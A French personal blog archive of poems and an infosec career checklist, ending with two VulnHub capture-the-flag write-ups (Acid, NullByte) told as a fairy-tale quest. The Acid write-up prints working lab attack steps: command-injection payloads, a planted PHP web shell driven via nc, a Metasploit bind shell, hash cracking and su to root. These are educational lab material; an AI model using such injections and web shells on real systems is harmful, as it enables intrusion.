lundi 9 janvier 2017

Je le vois, suis charmée.

Je le vois, suis charmée. Un coup d’œil, un reflet,
un clin d’œil, étheré, tout se fige, se décale,
un vertige magistral, bouleversant me saisit
le silence qui rugit, me fait tourner la tête.

Tu la vois, es charmé. De l'audace, approche toi
avec grâce, sans effroi, dis lui vrai, sans rougir,
un essai, un sourire, goute l'instant, savoure le,
ce moment, vaporeux, qui fait tourner la tête.

Les secondes pétrifiées, dans leur ronde s'éternisent,
sans accord qui résonnent pour calmer les frissons,
sans raisons qui s'accordent pour passer l'horizon
sans choisir, sans ciller, un avenir se brise.

Jess - la vie est poésie

jeudi 15 décembre 2016

Si seulement il neigeait... Tu nous manques

Couleurs sombres, peu de clair... Si seulement il neigeait...
Tu nous quittais hier, et nous sommes aujourd'hui,
malgré le froid, l'hiver, qui malmènent nos cœurs
réunis frères et sœurs, ta famille, tes amis.

Rien ne va aujourd'hui... Si seulement il neigeait...
Sont-ce mes larmes, est-ce la pluie, qui ruisselle et m'offense ?
Malgré les mots gentils, chuchotés bruyamment,
figeant nos sentiments dans un morne silence.

Quelle funeste pénombre... Si seulement il neigeait...
Comme ces temps nous furent sombres, vides d'espoir, vacillants.
Tant de fantômes, tant d'ombres, t'accompagnent en ce jour
comme autant de cris sourds et d'échos lancinants.

Quand le froid de mon cœur, le dispute à l'hiver,
pour tes filles et tes sœurs, quand reviennent les flocons,
quand un an de bonheur, de l'avent me rapproche
je souligne dans la roche, ni oubli ni pardon.


Jess - la vie est poésie

lundi 6 juin 2016

FullStack Infosec practitionner

En écho au contrat de genération CyberSécurité animé par @ISSA_France autour du Cyber Security Career Lifecycle (#CSCL) et aux articles #InfoSec challenges de @helpacsoout que j'avais eu plaisir à lire, voici un petit florilège actualisé que ma <3 @NathPlanteur <3 et moi avons eu le plaisir de vous compulser, enjoy!


1. Avez-vous déjà passé une certification sécurité ?
  • sur un sujet qui ne vous intéresse pas ?
  • sur un sujet "juste pour le fun" ?
  • que vous recommandez (#askingforafriend) ?

2. Avez-vous déjà contribué à la formalisation d'un schéma directeur sécurité ?
  • ou rédigé un schéma directeur sécurité vous-même ?
  • avec un budget ?
    • relatif à l'amélioration des 10% restant ?
  • et présenté ce schéma directeur sécurité au Board ?
    • et arbitré vos mesures après présentation au Board ?

3. Avez-vous déjà contribué à la rédaction une analyse de risques ou d'une politique de sécurité ?
  • ou rédigé vous même une analyse de risques ou une politique de sécurité. Ou les deux ?
  • ou validé une analyse de risques ou une politique de sécurité rédigée(s) par un autre ?
  • et présenté les conclusions au Board ?
  • et argumenté avec un auditeur externe sur la pertinence de vos documents ?

4. Avez-vous déjà dirigé le processus de certification de votre organisation (27x, pcidss, passi, etc) ?
  • et pris la responsabilité d'un retard de conformité ?
    • limitant de fait les capacités opérationnelles de vos métiers ?
  • et changé d'auditeur en cours d'audit pour une raison quelconque ?

5. Avez-vous déjà conçu un support de sensibilisation pour les utilisateurs de votre Système d'Information ?
  • pour des utilisateurs techniques et non techniques ?
  • et animé une "première" séance de sensibilisation ?
  • et animé une séance de sensibilisation pendant laquelle les utilisateurs sont demeurés intéressés du début à la fin ?
    • alors que cette séance est la n-ième à laquelle ils participent ?

6. Avez-vous déjà été confronté à la gestion d'un incident de sécurité ?
  • dans un cadre dépourvu de toute organisation ou procédure adaptée ?
  • pour un environnement sur lequel vous étiez responsables des contrôles ?
  • avec une compromission totale de votre SI (technique ou métier) ?
  • un vendredi 14 juillet ?
  • monté en épingles sur les réseaux sociaux ?
  • que vous apprenez par email de la part d'un tiers ?
  • que vous êtes obligés de notifier à un ou des tiers ?
  • impactant les Systèmes d'Information de tiers ?
    • et déclenché les garanties de votre couverture en responsabilité civile ?
      • et essuyé un refus de couverture par votre assureur ?

7. Avez-vous déjà accompagné votre Direction dans la rédaction d'un plan de continuité d'activité ?
  • et dirigé les opérations dans le cadre d'un plan de reprise d'activité ?
    • et "planté" la bascule en mode dégradé pour une raison quelconque ?
      • pour une raison connue de tous pour laquelle vous étiez jusqu'à présent l'oiseau de mauvais augure ?
  • et dirigé les opérations dans le cadre d'un plan de relocalisation des fonctions essentielles ?
    • et déplacé vos x fonctions sensibles sur un site de répli ne disposant que de x/2 positions ?
  • et dirigé un exercice de gestion de crise ?
    • pour lequel vous "tuez" le directeur de crise dans les 5 premières minutes de l'exercice
    • pour lequel 1/4 de la cellule de crise est toxique sans que les autres participants en soient informés ?

8. Avez-vous déjà dirigé un audit fonctionnel ?
  • que vous avez réalisé vous-même ?
  • sans possibilité d'entretien (questionnaires uniquement) ?
  • sans possibilité de questionnaire (entretiens uniquement) ?
  • et présenté des conclusions écarlates au Board ?
  • et présenté des conclusions satisfaisantes au Board ?

9. Avez-vous déjà dirigé un audit technique ?
  • que vous avez réalisé vous-même ?
  • sur la base de preuves d'audits fournies par un tier (mais vos scripts) ?
    • pour lesquelles vous avez-vous même développé les scripts d'audit ?
  • sur une base exclusivement documentaire (spécifications) ?
  • et interrompu l'audit suite à l'identification d'un point de compromission ?
  • et présenté des conclusions écarlates au Board ?
  • et présenté des conclusions satisfaisantes au Board ?

10. Avez-vous déjà dirigé des tests d'intrusion ?
  • que vous avez réalisés vous-même ?
  • sur un axe de travail "red team" (pas de contrainte de temps ou de périmètre) ?
  • sur un axe de travail "ingénierie sociale" ?
  • avec validation d'un scénario impactant la disponibilité de composants essentiels ?
    • entrainant une indisponibilité effective des composants cibles ?
  • et présenté des conclusions écarlates au Board ?
  • et présenté des conclusions satisfaisantes au Board ?

11. Avez-vous déjà piloté une organisation de veille opérationnelle en vulnérabilités ?
  • et réalisé la veille vous-même ?
  • lors de la publication d'une vulnérabilité écarlate ?
    • un vendredi 14 juillet ?
  • et arbitré un report de correction d'une vulnérabilité écarlate pour des contraintes métier ?
    • et déclenché votre gestion de crise suite à l'exploitation "malvenue" de ladite vulnérabilité ?
  • et forcé l'application ASAP de correctifs de sécurité ?
    • avec effets de bord et retour arrière ?

12. Avez-vous déjà administré toute ou partie d'un Système d'Information ?
  • dans un environnement professionnel ?
  • avec une DSI de x/2 collaborateurs avec x nécessaires aux opérations quotidiennes ?
  • composé d'éléments non maintenus ou obsolètes ?
  • en préparation de fusion avec le Système d'Information d'un tiers suite à un rachat ou une fusion ?

13. Avez-vous déjà développé un logiciel ?
  • dans un environnement professionnel ?
  • pour lequel vous avez au préalable formalisé les spécifications et le cahier de recette ? 
    • auxquels vous avez adjoint un cahier de recette sécurité ?
  • pour lequel vous avez assuré seul le développement ?
  • pour lequel vous avez travaillé en équipe ?
  • que vous avez publié en open source ?
  • avec un processus de V&V intégrant suivi des vulnérabilités et des correctifs ?

14. Avez-vous déjà publié articles et/ou livres ?
  • et présenté vos travaux lors d'une conférence ?
    • sans connaitre les organisateurs ?
  • sur un sujet que peu maitrisent ?
  • sur un sujet que beaucoup maitrisent ?

Question bonus : pouvez-vous réaliser demain (seul ou accompagné) toutes les réponses précédentes auxquelles vous avez répondu oui ? :-)

PS : Merci @helpacsoout, @helkhoury et @philoupas !

Jess - @JessicaGallante






lundi 1 février 2016

J'aime tant comme elle écrit

J'aime tant comme elle écrit, elle s'applique, elle répète
Dodeline de la tête, tellement passionnée
Par ces lettres à tracer, à l'encre ou au crayon
Son nom ou son prénom, parfois les miens aussi.

J'aime tant quand elle me lance, "Comment s'écrit ce mot ?"
Pour écrire aussitôt, toute seule toute sage
Sur d’innombrables pages, avec tant d'attention
Cette image d'un son, qui pour elle fait sens.

Assise à ses côtés, je profite en silence
De ces joies de l'enfance, instants d'éternité.

Jess - la vie est poésie

mercredi 16 décembre 2015

Comme à chaque fois que Noël revient - Tu nous manques

Que s'éloigne la passion
qui laisse, pour le pire,
s'enfuir tous les rires
qui blessent la raison.

Que s'estompe l'absence,
qui laisse mon âme hantée
de joies inexplorées
qui blessent le silence.

Que s'efface ma haine
qui laisse plein de douleur
mon coeur si lourd de pleurs
qui blessent mon âme en peine.

Pourquoi m'as tu quittée, j'avais tant à te dire.
C'est dur, si tu savais, de garder le sourire.

Jess - la vie est poésie

jeudi 20 août 2015

Challenge estival - Acid et VulnHub, Enquête au Royaume des Fées

Avertissement : j'explique dans cet article les méthodes que j'ai utilisées pour réaliser ce challenge - ne lisez donc pas ce qui suit si vous souhaitez le faire sans indice :-)


Après avoir joué avec grand plaisir avec le challenge NullByte proposé par @ly0nx, je me lance dans le tout nouveau challenge @vulnhub : le challenge Acid Server proposé par @m_avinash143 sans indication sur le niveau d'expertise requis mais avec l'information "This Virtual Machine is completely web based".

Il était une fois


Il était une fois un joyeux ménestrel nommé @m_avinash143 qui au retour d'un voyage dans les Mondes Enchantés décida d'ouvrir une porte vers le Royaume des Fées. Décidant à mon tour d'arpenter ces féériques contrées, je me met en chasse de la première porte avec un sortilege nmap qui échoue. J'améliore mon sort nmap vers le niveau 1 à 65535 et la porte 33447/TCP s'illumine.
root@kali:~# nmap -sT -A 192.168.80.133 -p 33447 
[...]
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-server-header: Apache/2.4.10 (Ubuntu)
|_http-title: /Challenge


Wow


En examinant avec attention le chambranle de cette première porte, je constate une ligne de runes qui scintille de poussière de fée.. wow..
"<!--0x643239334c6d70775a773d3d-->"
root@kali:~# printf "%b\n" \\x64\\x32\\x39\\x33\\x4c\\x6d\\x70\\x77\\x5a\\x77\\x3d\\x3d
root@kali:~# echo -n "d293LmpwZw==" | base64 -d
wow.jpg
Je contemple pensivement cette image "wow.jpg" et comprend ainsi qu'un indice nous a été laissé sous la forme d'une suite de runes MD5 correspondant au mot de passe "63425".. bien bien.. me voilà bien avancée..
root@kali:~/Desktop# strings wow.jpg | tail -n 1
;37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34
root@kali:~/Desktop# (IFS=':' ; printf "%b" $(strings wow.jpg | tail -n 1 | sed 's/;/\\\x/g;s/:/:\\\x/g;'); echo)
root@kali:~/Desktop# echo 7aee0f6d588ed9905ee37f16a7c610d4 > john.txt
root@kali:~/Desktop# gunzip /usr/share/wordlists/rockyou.txt.gz
root@kali:~/Desktop# /usr/sbin/john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt john.txt
63425            (?)
Je tente également ma chance sur l'image "bg.jpg" mais sans grande conviction cette fois-ci hormis une suite de runes que je note sur mon parchemin pour la suite de l'aventure (trop de poudre de Fée peut-être).
root@kali:~/Desktop# strings bg.jpg  | grep 'u\*9'      
u*9:HIJXYZghijvwxyz
Après une heure de recherche je l'avoue je suis un peu bloquée... J'ai un mot de passe (?) mais pas la Fée à laquelle il correspond et aucune porte d'authentification. Mis à part croiser les doigts pour qu'un sortilège dirbuster me débloque je ne vois pas trop quoi faire..

/Challenge


Je lance mon sortilège dirbuster à l'aide d'un petit grimoire listant les répertoires, fichiers et autres extensions ".php" propres à ces incantations :


.. une demi-heure à attendre.. Je ne connais pas la question mais augmenter la puissance de mon sortilège à 42 volumes de thread me parait être une bonne réponse.. Huit minutes.. c'est plus raisonnable..


.. et là énorme sourire, la seconde porte d'entrée url au Royaume des Fées ("/Challenge") - tête de linotte que je suis - est écrite en indice flagrant comme "title" sur la porte d'accueil ("parlez, ami, et entrez") et je suis totalement passée à côté :-).


/Welcome to hell


J'étudie avec attention cette nouvelle porte d'authentification et note précieusement tous les indices sur mon grimoire au fur et à mesure : la page "js/forms.js" m'indique "Copyright (C) 2013 peredur.net", le titre de la page est "Secure Login: Log In". J'ouvre donc mon sac à main et extrait mon encyclopédie de recherche préférée..


.. qui me renseigne au chapitre Github.com sur une application qui semble correspondre à celle qui m'accueille actuellement et après quelques sommaires comparaisons je finis par tomber sur la bonne nouvelle suivante à la fin du chapitre readme :-)


 .. mot de passe par défaut que je m'empresse donc d'employer pour ouvrir cette nouvelle porte !


/Challenge - LFI


Je "proceed further" comme il m'est proposé et la porte suivante

 
.. présente une faille LFI étudiée, il me semble, en première année du cursus de la Guilde des Fées.


Je renseigne à nouveau cette information dans mon grimoire et retourne à mon sortilège dirbuster.

/Cake


Pas mal du tout pour un sortilège dirbuster invoqué "gentiment". Je consulte tout de même les autres artefacts que celui-ci a identifié et, chat échaudé craignant l'eau froide, constate immédiatement que les runes du chambranle de cette nouvelle porte "cake.php" ("/Magic_Box") sont probablement un nouvel indice :


.. et là ca vaut bien le coup de lancer à nouveau un sortilège dirbuster :-)


/Magic_Box


Ces sortilèges dirbuster me sont décidément bien utiles et une porte prénommée "command.php" vaut bien un détour..


 .. et une incantation d'injection standard en croisant les doigts : "127.0.0.1;id" :


Après la faille LFI précédente, je peux donc m'introduire dans le Royaume des Fées sous l'identité de la Fée "www-data" :-)

Mon entrée dérobée au Royaume des Fées


J'entre furtivement dans le Royaume des Fées en me téléportant dans l'une des résidences ("127.0.0.1;pwd" m'indique "/var/www/html/Challenge/Magic_Box") et vérifie si le silence des alentours témoigne d'une activité secrète ou d'une plaine sinistre et désolée  ("127.0.0.1;ls -l /var/www/html/Challenge/") et je note le répertoire "js" (@Nathplanteur :-D) en 777 qui témoigne d'une Fée bien peu attentionnée.

 
J'utilise un charme de reconnaissance pour localiser les clés des Maitresses Fées Gardiennes du Royaume ("127.0.0.1;find / -perm -4000 -ls") et constate que toutes les clés sont d'antiques artefacts de pouvoir qui semblent impossibles à contrôler.


J'utilise la résidence de la Fée JS pour déposer un charme d'empreinte du Royaume ("127.0.0.1;echo "<?php echo "ok"; phpinfo(); ?>" > /var/www/html/Challenge/js/jess.php")..


 .. et améliore mon charme pour accéder plus facilement au Royaume des Fées..


.. en vérifiant que mon charme supporte l'ancienne magie du fameux grimoire metasploit si celui-ci peut m'être d'une quelconque utilité pour la suite de mon aventure..


Enquête au Royaume des Fées


Je peux désormais arpenter à ma convenance le Royaume à la recherche d'une clé d'une Maitresse Fée et après quelques minutes de pérégrination constate que le Royaume fait l'objet d'une intrusion et que les Maitresses Fées tentent de contenir cet assaillant !


Poursuivant mon enquête, je constate que le Maléfique Sorcier est dénommé "saman" aka "1337hax0r" et qu'il n'a semble-t-il pas laissé de trace de son méfait. Mais les Maitresses Fées sont sur sa piste et discutent ("hint.pcapng") de sa capture.
CMD="ls -la /home"
total 16
drwxr-xr-x  4 root  root  4096 Aug  7 17:48 .
drwxr-xr-x 23 root  root  4096 Aug  8 11:00 ..
drwxr-xr-x 17 acid  acid  4096 Aug  8 11:47 acid
drwxr-xr-x  2 saman saman 4096 Aug  7 18:07 saman

CMD="find / -uid 1001 -ls"

CMD="find /sbin/ -uid 1000 -ls"
930316  800 -rwxr--r--   1 acid     acid       818744 Aug  7 16:09 /sbin/raw_vs_isi/hint.pcapng
root@kali:~# cd /tmp/ && wget http://192.168.80.134:33447/Challenge/js/hint.pcapng
root@kali:/tmp# file hint.pcapng
hint.pcapng: pcap-ng capture file - version 1.0
root@kali:/tmp# tcpdump -evXln -r hint.pcapng tcp | less
        0x0030:  000a 6db0 7361 6d61 6e20 616e 6420 6e6f  ..m.saman.and.no
        0x0040:  7720 6120 6461 7973 2068 6527 7320 6b6e  w.a.days.he's.kn
        0x0050:  6f77 6e20 6279 2074 6865 2061 6c69 6173  own.by.the.alias
        0x0060:  206f 6620 3133 3337 6861 7830 720a       .of.1337hax0r.
Je me repose un instant pour faire le point sur les indices à ma disposition pour trouver à mon tour un moyen d'accéder aux secrets du Royaume. J'ai donc une incantation "63425" dont je ne connais pas l'usage mais peut être pourrait-il me servir à obtenir les pouvoirs de la Fée Acid voir même de prendre l'apparence du Sorcier Saman le Maléfique ?

Je récite l'incantation "63425" pour prendre le contrôle des pouvoirs du Sorcier Saman mais le Royaume m'en interdit l'accès :-(
root@kali:/tmp# echo -en '#!/bin/sh\necho start\n/usr/bin/id\necho 63425 | /bin/su saman -c 'id' 2>&1\necho stop\n' | base64
[BASE64]
root@kali:/tmp# CMD="echo '[BASE64]' > /tmp/jess.b64" && echo -en "GET /Challenge/js/jess.php?shell_exec=$(echo $CMD | tr ' ' '+') HTTP/1.0\r\n\r\n" | nc 192.168.80.134 33447
root@kali:/tmp# CMD="/tmp/jess.sh" && echo -en "GET /Challenge/js/jess.php?shell_exec=$(echo $CMD | tr ' ' '+') HTTP/1.0\r\n\r\n" | nc 192.168.80.134 33447

start
uid=33(www-data) gid=33(www-data) groups=33(www-data)
su: must be run from a terminal
stop
Qu'à cela ne tienne, je perfectionne mon charme pour que le Royaume me laisse entrer :
cat > jess.code << EOF
#!/bin/sh
/usr/bin/id
echo start
(sleep 1; echo 63425) | python -c "import pty; pty.spawn(['/bin/su','saman','-c','whoami']);"
echo stop
EOF

uid=33(www-data) gid=33(www-data) groups=33(www-data)
start
Password:
su: Authentication failure
stop
.. Bon mon charme est effectif mais l'incantation "63425" ne me permet pas d'utiliser les pouvoirs du Sorcier Saman ou de la Féé Acid ou même d'accéder au contrôle temporel de la Maitresse Fée Root Gardienne du Royaume des Fées. Je tente ma chance avec quelques mystères obtenus lors de ma visite de la résidence "/var/www/html/Challenge/" : "VXNlcnMudHh0", "zbp.yvnzt@qvpn", "Y0dGemN5NTBlSFE9" et "__341xnurZ" mais ces tentatives échouent à nouveau.

.. Essayons à nouveau mais avec mon fameux grimoire Metasploit et une incantation Meterpreter..
root@kali:~# msfconsole
msf > use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set RHOST 192.168.80.134
msf exploit(php_eval) > set RPORT 33447
msf exploit(php_eval) > set URIPATH /Challenge/js/jess.php?eval=!CODE!
msf exploit(php_eval) > set PAYLOAD php/bind_php
msf exploit(php_eval) > exploit

[*] Sending request for: http://192.168.80.134:33447/Challenge/js/jess.php?eval=error_reporting%280%29%3beval%28%24_SERVER%5bHTTP_X_SYSJDWXXZMJGDDQO%5d%29%3b
[*] Payload will be in a header called X-SYSJDWXXZMJGDDQO
[*] Started bind handler
[*] Command shell session 1 opened (192.168.178.134:33883 -> 192.168.80.134:4444)
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^Z
Background session 2? [y/N]  y
msf exploit(php_eval) > sessions -u 2
msf exploit(php_eval) > sessions -i

Active sessions
===============

  2   shell php
  3   meterpreter x86/linux  uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33 @ acid 

msf exploit(php_eval) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > shell
Process 2191 created.
Channel 9 created.
/bin/sh: 0: can't access tty; job control turned off

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@acid:/var/www/html/Challenge/js$

Après plusieurs heures à me battre désespérément contre des fantômes dans une plaine désertique et noircie par l'intrusion du Sorcier Saman le Maléfique pour identifier une escalade de privilèges valide sur cette version Ubuntu/Vivid du Royaume (dont le fameux bug #1447396 découvert par l'Enchanteur Tavis Ormandy ou l'exploit 37292 OFS - overlayfs chanté par le troubadour Rebel)


.. j'en suis rendue à l'évidence.. L'antique secret Root du Royaume des Fées demeure hors de ma portée. Qu'à cela ne tienne, je ne suis certainement pas la seule dans cette situation donc je brise le sceau d'un parchemin d'aide Twitter : "@unl1k3ly any hint-nospoil for me to step up from www-data? I'm lost in the Fairy Kingdom :'( CC ".

Les Maîtres du Royaume des Fées


Mon parchemin d'aide ne reste pas longtemps sans réponse et le joyeux ménestrel @m_avinash143 me recommande la saine lecture des comptes-rendus d'enquête publiés par les Maîtres du Royaume des Fées @g0blinresearch et Makman dans le Grand Recueil Magique @VulnHub.


A la lecture de ces comptes-rendus, je me rend compte que je suis tout simplement passée à côté d'un second indice "parlez, ami, et entrez" : le mot de passe "1337hax0r" de Saman le Sorcier Maléfique était connu des Maitresses Fées et celles-ci en parlaient dans l'échange "hint.pcapng" :'(

meterpreter > shell
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@acid:/var/www/html/Challenge/js$ su - saman
su - saman
Password: 1337hax0r

saman@acid:~$ sudo -i
sudo -i
[sudo] password for saman: 1337hax0r

  ____                            _         _       _   _                
 / ___|___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___
| |   / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \____\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                  |___/                                                  
root@acid:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@acid:~# cat flag.txt
cat flag.txt


Dear Hax0r,


You have successfully completed the challenge.

I  hope you like it.


FLAG NAME: "Acid@Makke@Hax0r"


Kind & Best Regards

-ACID
facebook: https://facebook.com/m.avinash143

Conclusion


En conclusion, ce challenge Acid est tout simplement délicieux et malgré une pointe de déception liée à la frustration de ne pas être parvenue à le résoudre seule, je félicite chaleureusement le joyeux ménestrel @m_avinash143 pour cette aventure, l'équipe @VulnHub pour tous ces challenges et les deux Maîtres du Royaume des Fées @g0blinresearch et Makman dont j'ai lu avec attention les comptes-rendus d'enquête .

Et quant à moi j'ai passé quelques soirées féériques absolument délicieuses au Royaume des Fées.

Jess - @JessicaGallante

mardi 18 août 2015

Challenge estival - NullByte et VulnHub, Sérénité et Harmonie

Avertissement : j'explique dans cet article les méthodes que j'ai utilisées pour réaliser ce challenge - ne lisez donc pas ce qui suit si vous souhaitez le faire sans indice :-)

Quoi de plus pratique qu'un challenge estival pour tester l'installation de ma nouvelle <3 Kali 2.0 <3 ? J'avais beaucoup aimé mon premier challenge #Darknet @vulnhub et décide donc de jouer à nouveau avec les épreuves proposées en regardant les pré-requis pour le nouveau NullByte proposé par @ly0nx : Niveau "Basic to intermediate" et commentaire "Hints: Use your lateral thinking skills, maybe you’ll need to write some code" me convenant tout à fait, je télécharge donc la machine virtuelle et me met au travail.

Les lois de l'harmonie



L'introduction à ce challenge que vous pouvez consulter sur le site de @vulnhub vous précise que vous devez jouer pour aller lire un fichier "/root/proof.txt".

Je me lance



Première étape, je scanne l'adresse IP avec mon scanner préféré et identifie trois ports TCP en écoute dont un serveur "SSH-2.0-OpenSSH_6.7p1 Debian-5" sur le port 777/tcp et un serveur web sur le port 80/tcp avec une simple image et un commentaire sibyllin.


Bon..  Un scan de port de 1 à 65535 ne m'apportant pas plus d'information et n'ayant pas d'exploit dans mon sac à main pour Apache ou OpenSSH, je pense qu'une énumération des répertoires web potentiellement disponibles est nécessaire.


re bon.. J'ai semble-t-il un répertoire "uploads" à ma disposition qui me permettra peut être de monter un code approprié pour autant que je sache comment y accéder.. Faisons donc un tour sur mon moteur de recherche préféré au cas où l'image fournie recèlerait un indice quelconque.


Après une dizaine de minutes à chercher sans succès des indices, je jette un coup d'oeil à mon dirbuster qui me trouve une application "phpmyadmin".. d'accord, pertinent mon Fernand mais je n'ai pas non plus d'exploit pour cette application et je ne vais pas attendre 146 ans (oui oui) de recherche par force brute.. Je retourne donc me perdre dans les méandres de l'Internet en tentant de rapprocher stéganographie et Kali et sans la moindre certitude d'avancer ou non dans une impasse..

Après une longue heure et de nombreuses tentatives sans succès à jouer avec cette image, une chaine de caractères que j'ai bien du lire une centaine de fois attire enfin mon attention juste après le tag GIF89a : "P-): kzMb5nVYJw". Je debase64/debase64(inverse()) sans succès, je tente ma chance comme mot de passe pour un utilisateur root sur le serveur ssh mais finalement la solution est bien plus simple p-) :-)


Par l'hydraforce ..


Le formulaire qui nous est offert présente un indice bienvenue et après quelques tentatives Hydra avec les dictionnaires usuels fournis par la Kali..


.. le dictionnaire "sqlmap.txt" me fournit le sésame attendu.


et par sqlmap (encore et toujours indispensable) ..


Que serait un challenge web sans injection SQL à tenter ..


.. sans base de données à dumper..


.. et sans empreinte de mot de passe à casser :-)


PHP(myadmin) ..


Retour à la case dirbuster initiale, j'ai un mot de passe root mysql et une interface phpmyadmin. Se pourrait-il que ?


.. un peu de curiosité n'a jamais fait de mal à personne ..


.. et l'avantage des hashs md5 comme mots de passe ..

(cette capture est totalement inutile bien entendu mais c'est tellement amusant)

.. et des services ssh ..


Et maintenant ..


Maintenant que j'ai un shell sur cette VM NullByte, partons à la recherche d'un moyen d'obtenir les privilèges "root". Ma première tentative (inspirée des quelques wargames OverTheWire que j'ai pu réaliser) consiste à identifier si des fichiers inhabituels disposent des bits setuid/setgid ..


.. et le cas échéant, à chercher si ceux-ci sont exploitables ..


.. et comme je n'ai pas mes strace/ltrace fétiches sur la VM NullByte, je récupère donc ce fichier "I have to fix this mess" sur ma Kali pour tenter de l'analyser ..


.. et après quelques tentatives jesstracesques, je pense comprendre comment fonctionne ce code ..


.. qui ressemble assez (en tout cas pour moi) à certains niveaux des wargames OverTheWire. Le code vulnérable appelle le binaire "ps" de manière relative (donc sur la base de l'environnement "PATH") et le fichier est setuid. Et comme je suis maitresse de ce chemin, je peux sans doute tromper ce binaire en lui faisant exécuter ma propre commande (en tout cas "c'est le plan" comme dirait Adrien ;-) ).


.. et mes privilèges étant désormais acquis il m'est possible d'aller lire le fameux fichier "/root/proof.txt" :



Conclusion


En conclusion ce challenge NullByte est véritablement amusant (avec une première étape assez compliquée à franchir si on ne regarde pas au bon endroit), une bonne partie des vulnérabilités génériques du monde du web s'y trouve représentée et ce challenge (en somme) est assez caractéristique de certains rapports de tests d'intrusion que @nathplanteur et moi relisons habituellement (pour le meilleur ou pour le pire :-|).

Merci ma jolie Nath qui ne dort jamais toujours pas ;-) et un grand merci @ly0nx pour votre support et vos encouragements en _live_ :-)

On prendra les froids, les brûlures en face
On interdira les tiédeurs
Des fumées, des alcools et des calmants cuirasses
Qui nous ont volé nos douleurs
La vérité nous fera plus peur
(Jean-Jacques Goldman - On ira)

Jess - @JessicaGallante